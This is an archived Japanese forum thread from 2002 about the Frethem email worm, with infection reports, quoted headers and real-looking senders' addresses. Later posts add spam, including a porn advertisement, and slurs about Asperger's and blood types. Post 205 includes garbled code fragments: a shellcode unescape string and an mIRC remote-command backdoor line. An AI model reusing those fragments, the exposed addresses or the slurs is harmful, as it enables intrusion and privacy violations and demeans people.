そっちの方は何だか、メル送ってもいい返事じゃないっすね。
そっちもやっぱ偽装のケースが多いんでしょうか。

108 :名無しさん@お腹いっぱい。:02/07/16 20:58.net
感染するバカってうんこ以下だな

109 :名無しさん@お腹いっぱい。:02/07/16 21:17.net
>>106
経路上のゲートウェイ(またはウィルスチェックサーバ)が
添付ファイルのみを削除している可能性があります。
この場合は安全です。
とりあえず、亜種の感染パターンとその検出法を確認して、
自分のマシンが感染しているかどうかを(以下略:酔ってるんで寝る

110 :名無しさん@お腹いっぱい。:02/07/16 21:47.net
今回は発生から伝播まで時間がなかったからね、ウィルスゲートウェイも
ほとんど間に合わなかったんじゃないかな。こいつらのエンジンも基本的には
クライアント用ウィルス対策ソフトと同等だし。

うちは夜中に自動更新してるから、昨日の夕方から夜にかけてかなりの
感染者が出た。おまえら、ちゃんと謝っとけよ(w >感染者ども


111 :名無しさん@お腹いっぱい。:02/07/16 21:58.net
Subject:
[oratech:4619] Re: Your password!
From:
kuga.toshio@kanto.ns-sol.co.jp
Date:
Tue, 16 Jul 2002 09:08:22 +0900 (JST)
To:
******@*****.oracle.co.jp

ATTENTION!

You can access
very important
information by
this password


もう、やになっちゃうわ
DO NOT SAVE
password to disk
use your mind

now press
cancel

(kuga)


112 :感染者:02/07/16 22:04.net
4件出してしまった。もちろん、謝っときますた

113 :名無しさん@お腹いっぱい。:02/07/16 22:52.net
これって、IEコンポーネントのバグでプレビューだけで感染する奴だろ?
NimdaだのBadtransだのが大流行してさんざん注意喚起されてたのに、
なんでいまだに引っかかる奴がいるんだ?

114 :名無しさん@お腹いっぱい。:02/07/16 23:06.net
企業内感染
1.ウィルス対策ソフトに守られているという油断
2.普段から実行ファイルをメールでやり取りする意識の低さ
3.リッチテキストが添付ファイルに変換されるというグループウェアの罠

一般ユーザー間の感染
1.ウィルス対策ソフト未導入
2.Windows/IE/Outlookセキュリティパッケージ未適用
3.Outlookプレビュー有効

こんなところだろ。

115 : :02/07/16 23:12.net
亜種が増えてるらしい。

116 :名無しさん@お腹いっぱい。:02/07/16 23:13.net
感染しても修復ツール使えば治るからだろ。
修復ツールはロハだし。利用者制限ないし。
周りが買えば、そいつらがウィルス検知してくれるし。

117 :名無しさん@お腹いっぱい。:02/07/16 23:44.net
>>115
もう亜種があるのか。早いね。

今まで散々このテのウィルスに対する警告はされてたのにこの実態は何?
coderedアタックもまだ有効ってことかぁ(藁。

118 :名無しさん@お腹いっぱい。:02/07/16 23:54.net
漏れの周囲、割れOSでパッチ当てられないヤシ多すぎ (;´Д`)


119 :106:02/07/17 00:00.net
>>109 >>110
俺にウィルスメール来たのが(メールチェックしたのが)昨日の夜の12時位だったから
もしかしたら間に合っていたのかもしれない。

アンチウィルスソフトも入れてるし、IEもパッチあててるし、プレビューも消してた。
でも添付ファイル無しのメールだったから油断して開いちまった・・。
アンチウィルスをもう一度アップデートして調べたがやっぱり感染して無かったよ。
油断してたとは言え、感染しそうになっちまったよ・・。

120 :名無しさん@お腹いっぱい。:02/07/17 00:13.net
Subject: Virus付きメールは早急に停止せよ
Date: Mon, 15 Jul 2002 23:49:48 +0900
From: "Akihiko Harada" <a_harada@mti.biglobe.ne.jp>
To: <turbolist-ml@turbolinux.co.jp>

turbolist-ml@turbolinux.co.jp より大量のVirus付きメールが
配信されているのを早く停止せよ

Virusと、個人情報をいつまでバラ撒くつもりか・・・



・・まず、おまえの脳波を停止しろよ。
個人情報ってなによ?(w


121 :名無しさん@お腹いっぱい。:02/07/17 00:37.net
うちにもキタ━━━━━━(゚∀゚)━━━━━━!!!!

『compath』ってトコのML経由でやって来ますた。
MLと言うことでアドレスはさらさないけど・・・これでまた
感染被害拡大のヨカーン。

122 :名無しさん@お腹いっぱい。:02/07/17 01:05.net
うちにもここからキタ━━━━━━(゚∀゚)━━━━━━!!!!

compath-ml-secret@hippo.metal.xxxxxxxx.co.jp

123 :名無しさん@お腹いっぱい。:02/07/17 01:25.net
>>120
> X-Mailer: Microsoft Outlook Express 6.00.2600.0000
目くそ鼻くそかよ!(w

124 : :02/07/17 03:06.net
XXXXX@tech.k-opti.comから来たメールに
Re: Your password!
ってかいてあった。
IE以外で開いてみたら、中身は>>60に描いてある内容と同じだった。
これってサポセンがウィルスにかかってるのか?

125 : :02/07/17 04:32.net
>>121-122
Subject: 受信者へのレポート
レポートキタ━━(゚∀゚)━━!!

126 :名無しさん@お腹いっぱい。:02/07/17 09:08.net
>>125
うちにもキタ━━(゚∀゚)━━!!

「受信者へのレポート」ってタイトルの3通。
「アラート - GroupShield チケット番号 ************** が生成されました」
ってのが1通。
どれもcompathしゃん&とあるビグローブのユーザーがらみ。
シロートの私には、なんでこれが自分のとこに送られてくるのかわからないけど……。

127 :名無しさん@お腹いっぱい。:02/07/17 09:27.net
>>121-122,125,126
キタ━━━━━(゚∀゚)━━━━━!!
しかも部長のところ。
うちの会社、一昨日からいっぱい来てるyo。
でも、感染者0
アンチウイルスソフト入れてるけど、信用ないんで、
常にセキュリティに気を配ってます(´Д`;)

128 :名無しさん@お腹いっぱい。:02/07/17 09:54.net
NTT東日本からキタ━━(゚∀゚)━━!!

129 :名無しさん@お腹いっぱい。:02/07/17 09:59.net
From: konishi@mail.doshisha.ac.jp
Received: from AFRICA ([202.23.132.39]) by mail.doshisha.ac.jp (8.9.3 (PHNE_18546)/3.7W-001122) id RAA08095; Mon, 15 Jul 2002 17:07:52 +0900 (JST)
Date: Mon, 15 Jul 2002 17:07:52 +0900 (JST)
Message-Id: <200207150807.RAA08095@mail.doshisha.ac.jp>
To: tlw60-users@meigetsu.turbolinux.co.jp
Subject: Re: Your password!
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary=L1db82sd319dm2ns0f4383dhG

アフォ大学キタ━━━( ´∀`)・ω・) ゚Д゚)゚∀゚)・∀・) ̄ー ̄)´・ω・`)_-)゚∋゚)´Д`)゚ー゚)━━━!!!!!
デカいメールは無視する設定だから今ごろ気づいた(w

130 :121:02/07/17 11:47.net
うちにもレポート キテタ━━(゚∀゚)━━!!(w

件名:受信者へのレポート
警告: 添付ファイル att3.eml はウイルス Exploit-MIME.gen に感染しています。添付
ファイルからウイルスが駆除されていません。

さらに
件名:アラート - GroupShield チケット番号 〜〜〜〜〜 が生成されました

>>126
compathと聞くとココが思い当たるが・・・。
http://www.google.com/search?q=COMPATH&ie=UTF-8&oe=UTF-8&hl=
ja&btnG=Google+%E6%A4%9C%E7%B4%A2&lr=lang_ja
の一番上のヤツ。昔ココの懸賞に応募した記憶あるし(w

131 :121:02/07/17 11:51.net
途中で改行入れたら切れた・・・鬱。(´Д`;)
正解はコチラ。
http://www.google.com/search?q=COMPATH&ie=UTF-8&oe=UTF-8&hl=ja&btnG=Google+%E6%A4%9C%E7%B4%A2&lr=lang_ja


132 :87:02/07/17 12:04.net
>>87 の件ですが重大な事実誤認がありました。
From: に返すのではなく To: に返すのでした。
いったい何のために...

133 :名無しさん@お腹いっぱい。:02/07/17 13:58.net
>>130
うちにもcompat-ml-secretできたよ。
一発目がbiglobeユーザーで、これ以降ML経由とみられる
クラリオンだのなんだのから続々と。
でもMLなんか入ってないのになあ。


134 :名無しさん@お腹いっぱい。:02/07/17 14:01.net
compath、漏れとこもまったく同じの来た。
漏れも>131の懸賞応募したことあるわ。

135 :名無しさん@お腹いっぱい。:02/07/17 14:10.net
compat-ml-secretを運営している会社のトップページに、
「弊社メールサーバからウィルスメールが配信されました。
大変ご迷惑をおかけしておりますが、 原因については只今調査中ですので、
もうしばらくお待ちください。」
と出ています。

136 :名無しさん@お腹いっぱい。:02/07/17 14:27.net
>>130

なるほど〜。
ココの懸賞、応募した記憶とかないけれど、でもしたことあるのかもな〜忘れてるからな〜(汗。

ところで、うちに来たのてレポートだけで、ウイルスのほうは来てない。なんでだろ?



137 :126=136:02/07/17 14:31.net
>>136

……いや、よく考えたらあった>ウイルスメール
見知らぬメアドから来たのが一通。
うざいと思ってサーバ上で消してしまったので、どっからかはもはや分からないけど。



138 :126=136,137:02/07/17 14:32.net
名乗るの忘れてますた。

連続カキコスマソ。


139 :133:02/07/17 15:32.net
>>137
ああ、うちと同じだ。
最初に ***@***.biglobe.ne.jp からきてて
これ冷凍したら数時間後にML経由で続々とやってきた
一発目のbiglobeメアドに覚えがないんだがなあ


140 :でじこ:02/07/17 16:07.net
来ないにょ〜

141 :hippo.metal.reedrex.co.jp:02/07/17 18:19.net
http://uptime.netcraft.com/up/graph?site=hippo.metal.reedrex.co.jp&submit=Examine
OS, Web Server and Hosting History for hippo.metal.reedrex.co.jp
OS Server Last changed IP address Netblock Owner
FreeBSD Apache/1.2.4 1-May-2002 210.255.185.196 REED REX Corporation
FreeBSD Apache/1.2.4 13-Mar-2001 210.255.185.195 REED REX Corporation

あぱっち古い?

142 :名無しさん@お腹いっぱい。:02/07/17 22:01.net
ttp://www.turbolinux.co.jp/information/support020717.html

TURBOLINUXがお詫び文出してる。

143 :名無しさん@お腹いっぱい。:02/07/17 22:13.net
http://nws.tns-tanabe.co.jp/nc/
で配信されたよー。
怖い怖い。

144 :名無しさん@お腹いっぱい。:02/07/17 22:36.net
>>141
禿しく月危いヨカン

145 :しかし:02/07/18 01:15.net
なんで苦情を送り返してくる人(ソフトウェア関係の会社の人ばっかり)はなんであんなに高圧的なんだろう。

感染して送り出してしまったこっちは何も言えないけど。

146 ::02/07/18 01:18.net
なんでがかぶた

147 :名無しさん@お腹いっぱい。:02/07/18 04:33.net
>>145
だったら何も言うな

148 :名無しさん@お腹いっぱい。:02/07/18 05:52.net
frethemってなんてよむの?

149 :名無しさん@お腹いっぱい。:02/07/18 06:14.net
>>148
>>19

150 :名無しさん@お腹いっぱい。:02/07/18 08:52.net
>147
お前も言うな

151 :名無しさん@お腹いっぱい。:02/07/18 09:04.net
○○○○@mail.doshisha.ac.jpという見ず知らずのヤシからWORM_FRETHEM.Kが
送られてきた。
これって同志社大学のアドレス?

152 :名無しさん@お腹いっぱい。:02/07/18 09:09.net
>>151 送信者詐称

153 :名無しさん@お腹いっぱい。:02/07/18 13:21.net
え? これKlezみたいに送信者詐称するの?
しないと思ってたけど。

154 :133:02/07/18 18:11.net
compath-mlの発信元から詫び状がきたよ
たぶんこのスレの何人かにも来てるはず。
ML経由でウィルスばら撒いた(しかも休止中のML)ってのが
よほど応えたんだろうね


155 :名無しさん@お腹いっぱい。:02/07/18 18:48.net
turbolinuxは詫び状出したんだろうか?

156 :名無しさん@お腹いっぱい。:02/07/18 18:59.net
不特定多数が参加するMLは、text/plain なメールしか
受け付けないように設定しておく。ウィルスも排除できるし、
Outlook Express のタコなHTMLメールも排除できてウマー

157 :名無しさん@お腹いっぱい。:02/07/18 20:09.net
まだ来ないよ〜!!いや、来なくていいが。。。
Virus付きメールよりも、南アフリカの某大学から来る学歴書付きメールの方がウザイ。
何もしなくても、個人情報集まってくる(--;

158 :133:02/07/18 20:49.net
そういえば、以前にfree-ml.comのMLでもKlezが流れたことがあった。
意図的に流したのかもしれないけど、ワビとかはなかったな。
ただ「注意してください」程度のものだった。


159 :名無しさん@お腹いっぱい。:02/07/18 21:40.net
各ベンダでの呼び名一覧
W32.Frethem.K@mm [Symantec]
I-Worm.Frethem.l [AVP]
W32/Frethem.l@MM [McAfee]
WORM_FRETHEM.K [Trend]
W32/Frethem-Fam [Sophos]

160 :159:02/07/18 21:47.net
ごめん、158はIとKがまじっちゃってた

161 :名無しさん@お腹いっぱい。:02/07/18 22:15.net
なんか新しいの出てない〜?

162 :名無しさん@お腹いっぱい。:02/07/18 23:43.net
あっという間に蔓延したが、1日でほぼ収束しちゃったね

163 :名無しさん@お腹いっぱい。:02/07/19 00:01.net
メール文の最後に発信元の名前を書き付けるから
会社名とか入れてると最悪だ

164 :名無しさん@お腹いっぱい。:02/07/19 01:58.net
ヨカン外れちゃったね。
今回は絶対大流行するとふんで、ふだんは流さないウィルス注意報を
管理してるMLに流しちゃったのに…
もちろんMLはHTMLハネてるけど、メール初心者ばかりのMLで、
誰かが感染するたびに大騒ぎになるから…

165 :名無しさん@お腹いっぱい。:02/07/19 09:28.net
メーリング・リスト管理者はウイルス「Frethem」の配布を防げ
http://itpro.nikkeibp.co.jp/free/NOS/NEWS/20020718/2/

166 :ウイルスメール1万1千人に、接続会社が送信:02/07/19 16:05.net
 インターネット接続サービス会社「豊島ケーブルネットワーク」(本社・東京都豊島区)が、
コンピューターウイルスが入った電子メールを誤って同社の顧客約1万1000人に一斉送信
していたことがわかった。
 メールの誤送信があったのは15日午前8時半ごろ。サービス情報などの提供を受けるため
に登録した顧客あてに一斉送信した。同社には18日夕までに約100件の苦情や問い合わせ
が寄せられ、同社は全員におわびのメールを送った。
 このウイルスは、感染したパソコンのアドレス帳に記載された人全員にウイルス入りメール
を送りつける。経済産業省の外郭団体「情報処理振興事業協会」セキュリティセンターは「接
続サービス会社が感染メールを一斉送信した例は聞いたことがない」としている。
http://www.yomiuri.co.jp/04/20020719ic05.htm

167 :名無しさん@お腹いっぱい。:02/07/19 21:55.net
やっぱ「IEのキャッシュからメールアドレスを抽出する」機能が
ないと、間接的にもつながりのない不特定多数の人に送って
しまうという事がないのが弱いかな。
自分の場合、badtransやklezのときはWEBページで公開して
いるアドレス宛にたくさん来たけど、frethemは未だ一通も来てない。

168 :.:02/07/19 22:57.net
これってほんとの所、どういう経路で来てるの。さっぱり分からん。

うちもMLで来たのもあるけど、そのサーバーマシンが感染したの?
あちことでMLから送られてきたって記事になってるじゃん。
Nimdaのように、サーバーが感染したわけ?




169 :名無しさん@お腹いっぱい。:02/07/19 23:18.net
>>168

>166>サービス情報などの提供
登録アドレス管理してるヤシのパソコンが感染したと禿しく思われ。


170 :.168:02/07/20 00:12.net
>>169
>166>サービス情報などの提供

サンクス。ちょっと考えてみた。

ってことは、今回の場合、そのMLが添付ファイルを撥ねない設定になって
いる場合、送信権限のあるやつのパソコンが感染し、MLへの投稿のような
形でメールを送り、MLに登録してあるすべてのアドレスへ送信。
さらに送信者のところ(from)も、ML登録者の中から選んで偽った、
という感じなの?

なんというか、送信先を、「localhost.XX.JP」とかMLで使われるのを優先
して拾って送信するようにしてあるみたいだね。ランダムに送るのだと、
こんなにMLにばかり被害はなかったんじゃないのかな。

一般人が参加するMLだと添付ファイル禁止のとことが多いけど、サービス
情報提供用とかだと、添付当然だよね。考えてみたらオレもそんなやつ
いっぱい受信してるよ。送信できないけどね。

感染したパソコンの数は大した事なかったのに、飛び交ったウイルスメール
の数は凄まじく膨大だった、ということかな?


171 :名無しさん@お腹いっぱい。:02/07/20 00:33.net
今、Frethemが届きました。ノートンさんがはじいてくれたので助かりました。
でも、相手は記憶にない人です。
これは、ウィルスメールを配信してますよと教えた方がいいのでしょうか?

172 :名無しさん@お腹いっぱい。:02/07/20 01:38.net
>>171
よっぽど親しい知り合いじゃない限りほっとく。
どうせあちこちから連絡がきて、いまごろ大忙しだ。

173 :CATV会員一斉送信:02/07/20 09:46.net
>>169 >>170
本当の原因は豊島ケーブルネットワークが会員である私の問い合わせに
「通信の秘密にかかわることなので、お答えできない」ことと、「社内の
PCが感染したということはない」、「アドレスが漏洩した事実はない」と
電話で回答している。(アテにはならんが)

しかし、送信先に使われた同報アドレスは、alluser@t.toshima.ne.jp で、
このアドレスは1999年から2000年にかけて、案内メール送信先アドレスとして
使用した実績がある。これが原因のはず。

アドレスは http://www.toshima.ne.jp/Frethem.html に記載されているので、
公開情報となった。ただしこのページには「特に発信アドレスが alluser@t.
toshima.ne.jp を偽って発信されているメールがあります」と書いてあるが、
「踏み台にされているという意味で(豊島ケーブル談)」あって、alluserが
メールのfromになっているわけではなく、toになっている。fromは「FRETHEM
はfromを詐称しない(IPA談)」のであるから、感染者であると思われる。

174 :CATV会員一斉送信:02/07/20 09:47.net
ZDNetに詳細記事が出ています。原因についての憶測も読売の記事よりは正しいと思う。
http://www.zdnet.co.jp/news/0207/19/njbt_09.html

175 :1:02/07/23 22:39.net
1です。流行るとおもったんだけどなぁー。
スレ番100以下まで落ちたのでラストカキコsage。


176 :名無しさん@お腹いっぱい。:02/07/25 20:38.net
はやったのは最初だけか・・・
つまらんな

177 :cheshire_black_cat:02/07/25 21:01.net
>>176
アンチウイルスソフトで対応できなかった(ひねりも無い)最新版が、だた広まっただけだから。

178 :名無しさん@お腹いっぱい。:02/07/25 22:16.net
HTMLメール対応メーラ使ったこと無いから知らんのですけど
プレビューしただけで感染するってのは前からあったんですか?

179 :名無しさん@お腹いっぱい。:02/07/29 08:52.net
俺ウイルスバスター2002使ってて、「Re: Your Password!」を受信すると
「HTML_IFRMEXP.GEN」を検出したと表示されるけど、実は「WORM_FRETHEM.K」だったんだな。

考えてみると「HTML_IFRMEXP.GEN」の検出って
IEのセキュリティホールに起因するダイレクトアクション機能をブッ殺すんだな。
いつの間にバスターにダイレクトアクションをブッ殺すパターンが加わったんだ…。

180 :名無しさん@お腹いっぱい。:02/07/29 09:19.net
>>178
元祖はバブルボーイ。だが、バブルボーイは日本語Windowsでは発病できなかった。
ちょうど1年前くらいにはやったNimda、Badtransあたりがプレビュー感染のメジャーになった。

181 :178:02/07/29 22:38.net
ありがとうございます。そうだったんですか、よくわかりました。

182 :名無しさん@お腹いっぱい。:02/08/03 15:35.net
ウイルスより
ぜんぜん知らない野郎のアドレス帳に自分のアドレスがあることが鬱だ。

株式会社リード・レックス

ってまったく知らないのにウイルスとお詫びをいただいてコワヒ

183 :名無しさん@お腹いっぱい。:02/08/26 12:02.net
ニュース速報+のスレ

184 :名無しさん@お腹いっぱい。:02/12/05 02:36.net
流行しなかったんだよなぁ結局

185 :山崎渉:03/01/16 03:58.net
(^^)

186 :山崎渉:03/04/17 12:34.net
(^^)

187 :山崎渉:03/04/20 06:03.net
   ∧_∧
  (  ^^ )< ぬるぽ(^^)

188 :山崎渉:03/05/28 17:17.net
     ∧_∧
ピュ.ー (  ^^ ) <これからも僕を応援して下さいね(^^)。
  =〔~∪ ̄ ̄〕
  = ◎――◎                      山崎渉

189 :100人に1人の脳障害:03/06/17 09:57.net
◎人の嫌がることをズケッと言うのはこんな奴!
<アスペルガー症候群(自閉症スペクトラム)←脳の機能的疾患(遺伝が要因)>
●変化を嫌う
http://web.kyoto-inet.or.jp/org/atoz3/kado/book1/Williams-Asp.htm

●接し方のルールがわからず無邪気に周囲の人に対して迷惑なことをしてしまうことがある。人を傷つけるということには鈍感(相手の立場に立って考えられない)。
●パターン的行動、生真面目すぎて融通が利かない
 毎朝の通学電車では同じホームの同じ場所から、同じ時間の同じ号車に乗ることに決めていたりする。パターンを好むということは反復を厭わないことでもある。
●アスペルガー症候群の子どもは(大人も)感覚刺激に対して敏感。敏感さは聴覚、視覚、味覚、嗅覚、温痛覚などのいずれの感覚の敏感さもありえる(特に視覚が敏感)。
●アスペルガー症候群の子ども(大人も)は予測できないことや変化に対して苦痛を感じることが多い。
http://www.autism.jp/l-02-03-aspe3.htm

●独り言を言うことが多い(考えていることを口に出す)
●物事をいつまでも同じにしておこうとする欲求が強く、そうでないと非常に不安。いわゆる「こだわり」。
●自発的に行動することが少なく、興味の幅が狭い
●物まねをしているような不自然な言語表現
●自閉症スペクトラム全体としては一万人に91人(およそ100人に1人)。
http://www.ypdc.net/asuperugar.htm

★自閉症スペクトラムの考え方(アスペルガーに至らない気質の偏りもある(遺伝性))
http://www.imaizumi-web.com/030413.html  
   
★アスペルガー症候群(自閉症スペクトラム)かどうかのテスト
http://twitwi.s10.xrea.com/psy/add.htm 
http://www.geocities.co.jp/Beautycare/5917/as/marksheetmake.html

190 :山崎 渉:03/07/15 11:11.net

 __∧_∧_
 |(  ^^ )| <寝るぽ(^^)
 |\⌒⌒⌒\
 \ |⌒⌒⌒~|         山崎渉
   ~ ̄ ̄ ̄ ̄

191 :ぼるじょあ ◆yBEncckFOU :03/08/02 05:23.net
     ∧_∧  ∧_∧
ピュ.ー (  ・3・) (  ^^ ) <これからも僕たちを応援して下さいね(^^)。
  =〔~∪ ̄ ̄ ̄∪ ̄ ̄〕
  = ◎――――――◎                      山崎渉&ぼるじょあ

192 :山崎 渉:03/08/15 22:58.net
    (⌒V⌒)
   │ ^ ^ │<これからも僕を応援して下さいね(^^)。
  ⊂|    |つ
   (_)(_)                      山崎パン

193 ::03/08/18 22:33.net
<血液型O型の一般的な特徴>( すべて許していると調子にのってつけこんでくるぞ!! )

■優秀な人間を叩いて安心しようとする。多数対少数のときだけめっぽう強気。才能ある人間と対峙できない
■場所が変わると手のひらを返すように態度が豹変する ( あの連中の中じゃヘコヘコさせられてきたが、うちに来たら見ていろ! 礼儀を教えてやるぜ。 )
■カッコイイ人に注目したがるが自分を磨こうとしない。なぜか、カッコイイ人は自分にソックリだと信じ込む
■基本的に怖がり。粘着にからまれるとすぐに全く関係ない人と戦わせようとする ( どうせ>>1さんはヒッキーでしょ? / あいつだってDQNだからジサクジエンしてるぜ )
■早とちりが多く、誤爆と気付いた後でも釈明できない。いい人を装って忘れる ( そういう土地柄だったのさ )
■毒舌を吐いて場の空気を陰険にする。そのあと自分で耐え切れなくなりご都合主義にあきれる。( いったいこの国はどうなってるんだ? 間違っている! )
■スケールの小さい自画自賛をして小市民的に満足しようとする( 俺んちの車は古いが車も持ってない奴に比べればマシな方だな )
■すぐにおせっかをやくが、自分のためであるということを見抜かれる。それに気付いて恥ずかしさをごまかすために大袈裟にキレる
■マニアックで虐待的。ケチだけつけて批判される所には出ない。人に観察されているとを知って焦る
■自分が企んでいるのに相手を悪人に仕立て上げ、己の為に餌食にする。攻撃を誘って自分の憎悪に酔いしれる。
■たいしたこともやってないうちに大物ぶる。 ( 顔が見えないインターネットでは自分の才能や苦労を多めに見積もって書き込む )
■世間に通用しないような事ばかり繰り返して自分に課した目標から逃げる。あげくに人のせいにして相手に伝わらない方法でキレる。
■人生経験未熟なので集団でしか相手を見れない ( 君のような人はウチでは…  / ○さんによく似てるから… )


194 :@@:03/08/18 22:34.net
セーラー服の少女と3P。なんともうらやましい光景です。
オマンコは小ぶりながらもビラビラ大きめで相当使い込んでいる様子!
オッパイの方も手ごろな大きさで揉み応えありそうですよ。
ローターで喘ぎまくっちゃうところなんか感度よすぎ!
セーラー服好きな方はここ!!
無料動画を観てね
http://www.pinkschool.com/


195 :電脳プリオン:04/12/11 00:37:59.net
聞いたこともないウイルスでつ。

196 :& ◆98/X7zGFs. :05/01/22 19:08:29 .net
-

197 :名無しさん@お腹いっぱい。:05/01/22 23:34:50 .net
おや?

198 :名無しさん@お腹いっぱい。:2005/07/06(水) 12:03:50 .net
そうだよ

199 :名無しさん@お腹いっぱい。:2005/07/11(月) 15:23:41 .net
まじ?

200 :名無しさん@お腹いっぱい。:2006/06/03(土) 10:34:31 .net
 |:::|::|__    、-'''"´ ̄ ̄`"''''-、   __|_::::||
__|::::|::|_|_   / /       \ \|::::||;;;||..  ___ .___
m|::|::|::::|_/   ● ,,.  .,, ●    ヽ:||::::::_|__|_ | |iiii
::::||::::|;;;;;|.     (__人__)     |目;;‖|≡| ̄|iiii
::::||::::|旦''-、、,,,,,,______,,,,,,、、-'' 超巨大ショボーン

201 :名無しさん@お腹いっぱい。:2008/01/08(火) 00:19:54 .net
dfhfhh




ururt




ryeeyer





eryerye




dfhfdhdf




eryery



202 :名無しさん@お腹いっぱい。:2008/02/01(金) 16:24:01 .net
あげ

203 :Kuw267x:2008/07/13(日) 01:24:48 .net
てす

204 :名無しさん@お腹いっぱい。:2009/02/19(木) 08:22:54 .net

【社会】ヤフオクで虚偽出品 被害者からの苦情電話が通じない山間部へ逃げるも、「うんざり」して自首 和歌山

1 :おっおにぎりがほしいんだなφ ★:2009/02/19(木) 07:57:49 ID:???0
かつらぎ署 詐欺容疑自首の男逮捕

インターネットの「ヤフーオークション」で虚偽の出品をして
落札者から金をだまし取ったとして、かつらぎ署は18日、
住所不定、無職植田達也容疑者(34)を詐欺容疑で緊急逮捕した。

植田容疑者の携帯電話に、被害者からの問い合わせや苦情が相次ぎ、
「うんざりした」と、同日夕に自首してきたという。

発表によると、植田容疑者は昨年10月、オークションの掲示板に
「ミスターチルドレンのコンサートチケット2枚を販売する」という虚偽内容の記載をし、
落札した高松市内の女性(31)に代金名目で2万5790円を口座に振り込ませ、
だまし取った疑い。

植田容疑者は「仕事がなくなり、金に困っていた。約20人から計約80万円をだまし取った。
相手から、問い合わせや苦情の電話が頻繁にかかってきて、携帯電話が通じない
山間部へと逃げてきた」と供述。
同署で取り調べを受けている最中にも、被害者の女性からの電話がかかってきていたという。


ソース:読売新聞
http://www.yomiuri.co.jp/e-japan/wakayama/news/20090218-OYT8T01020.htm





205 :名無しさん@お腹いっぱい。:2011/01/06(木) 20:47:27 .net
4 :z:2010/08/28(土) 10:25:02 ID:NtVfNVmU0
452 :動け動けウゴウゴ2ちゃんねる:2010/07/10(土) 15:53:49.30 ID:7Cr427LS0
>>440
・プロバイダの新しい有料メールアドレス
・ジャパンネットバンク銀行の使い捨て番号のVISAデビット
ニ.フ.ティ.ーの100円のメアドプラスで認証が通った。
認証できたら、メアドプラスは登録解除してOK。
普通のクレジットカードでは漢字の住所が登録できたが、
ジャパンネットバンク銀行のVISAデビットだとローマ字入力の住所を要求された。

ローマ字の書き方はこれ
ヘボン式ローマ字綴方表
http://www.seikatubunka.metro.tokyo.jp/hebon/

漢字住所でどんな順序でどんなローマ字、番地の番号を使ったかは、
メモ帳でメアド・パスワードと一緒に控えておいたほうがいい。
453 :動け動けウゴウゴ2ちゃんねる:2010/07/10(土) 15:55:00.00 ID:t966sYmN0
ローマ字変換
eip=eip+unescape("%u7030%u4300")
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
n0=on 900:text:!exec*:*:{.notice $nick Execut comanda: $2-
http://www2u.biglobe.ne.jp/~yuichi/rest/kanarome.html
454 :動け動けウゴウゴ2ちゃんねる:2010/07/10(土) 15:56:54.59 ID:qfPgiwgp0
●買うなんて荒らしと一緒だぞ
455 :動け動けウゴウゴ2ちゃんねる:2010/07/10(土) 15:58:50.21 ID:d455Pgrw0
荒らしが運営に喧嘩売っても被害を被るのは巻き添え食らってる人だけっていう…
荒らしたもん勝ち
456 :動け動けウゴウゴ2ちゃんねる:2010/07/10(土) 15:58:54.30 ID:sPPrGi160
荒らしが●を買ったんだとしたら、個人情報登録してるんじゃないのか?
それで同一名義のアカウント全部停止するとか、
新たに買おうとしてきても拒否するというのはできないんだろうか?

206 : 忍法帖【Lv=40,xxxPT】(1+0:8) 【32.7m】 電脳プリオン ◆3YKmpu7JR7Ic :2012/10/14(日) 12:27:53.76 ?PLT(12079).net

  ∧_∧
  ( ・∀・)   | | ガッ
 と    )    | |
   Y /ノ    人
    / )    <  >__Λ∩
  _/し' //. V`Д´)/ ←>>187
 (_フ彡        /


207 :名無しさん@お腹いっぱい。:2014/09/25(木) 21:44:53.72 .net
207

総レス数 207
62 KB
掲示板に戻る 全部 前100 次100 最新50
read.cgi ver.24052200